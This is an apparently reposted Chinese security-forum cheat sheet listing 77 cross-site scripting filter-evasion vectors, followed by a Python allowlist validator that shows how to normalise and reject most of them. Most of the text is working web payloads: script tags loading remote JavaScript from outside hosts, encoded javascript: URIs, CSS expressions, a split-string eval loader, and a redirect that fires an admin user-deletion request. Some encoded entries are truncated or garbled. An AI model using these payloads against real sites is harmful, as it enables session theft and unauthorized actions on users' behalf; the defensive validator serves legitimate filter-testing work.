12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267

It seems there isn't much material on XSS on t00ls, so I'm copying over something good I came across; not sure whether any of you need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (the semicolon is required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed (broken) IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hexadecimal encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escape filter
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE variant
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed Flash that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash you can slip in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS (trailing dot)
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
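A scheme-allowlist check for HREF/SRC attribute values, added here as an example (it is not part of the original post or of the cheat sheet it copies). It shows why the case changes, embedded tab/newline/CR/NUL, leading spaces and HTML entity encodings of vectors (3)-(5), (11)-(14), (17) and (19) all defeat a plain search for the string "javascript", and how normalising first and then comparing the scheme against an allowlist handles every one of them; the function names and sample values are my own assumptions.

```python
import html
import re
from typing import Optional

# Allowlist of schemes an HREF/SRC may carry; javascript:, vbscript:, data:
# and anything unknown fall through to "reject" (allowlist, not blocklist).
ALLOWED_SCHEMES = {"http", "https", "mailto"}
# Characters the vectors above smuggle into the scheme: ASCII controls and
# space (0-32: NUL, tab, LF, CR), NBSP (160), Unicode spaces 8192-8205,
# ideographic space (12288) and the BOM (65279). Browsers skip them while
# sniffing the scheme, so they are dropped before the check.
_NOISE = re.compile(r"[\x00-\x20\u00a0\u2000-\u200d\u3000\ufeff]")

def normalise_url(value: str) -> str:
    """Decode HTML entities (with or without the trailing ';', as browsers
    do) and strip the noise characters."""
    return _NOISE.sub("", html.unescape(value))

def scheme_of(url: str) -> Optional[str]:
    """Lower-cased scheme, or None for a relative URL (/path, //host/path)."""
    m = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", url)
    return m.group(1).lower() if m else None

def is_safe_url_attribute(value: str) -> bool:
    """True if the value can only resolve to an allowlisted scheme. This
    checks the scheme only; a SCRIPT SRC also needs a host allowlist."""
    scheme = scheme_of(normalise_url(value))
    return scheme is None or scheme in ALLOWED_SCHEMES

# Constructed sample values modelled on the vectors above (not from any
# real application); True means the value should be accepted.
SAMPLE_VALUES = {
    "javascript:alert('XSS')": False,                 # (3)
    "JaVaScRiPt:alert('XSS')": False,                 # (4)
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')": False,  # (5)
    "jav\tascript:alert('XSS');": False,              # (11)
    "jav&#x09;ascript:alert('XSS');": False,          # (12)
    "jav\r\nascript:alert('XSS');": False,            # (13), (14)
    "java\x00script:alert('XSS')": False,             # (17)
    " javascript:alert('XSS');": False,               # (19)
    'vbscript:msgbox("XSS")': False,                  # (40)
    "http://example.com/a.jpg": True,
    "//example.com/a.jpg": True,
    "/images/a.jpg": True,
}

def check_samples() -> bool:
    """True when every sample is classified as expected."""
    return all(is_safe_url_attribute(v) == ok for v, ok in SAMPLE_VALUES.items())
```

The same normalisation is needed before any output encoding or filter decision, because the entity form without semicolons in (9)-(10) decodes exactly like the form with them.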

Original source: http://fuzzexp.org/u/0day/?p=140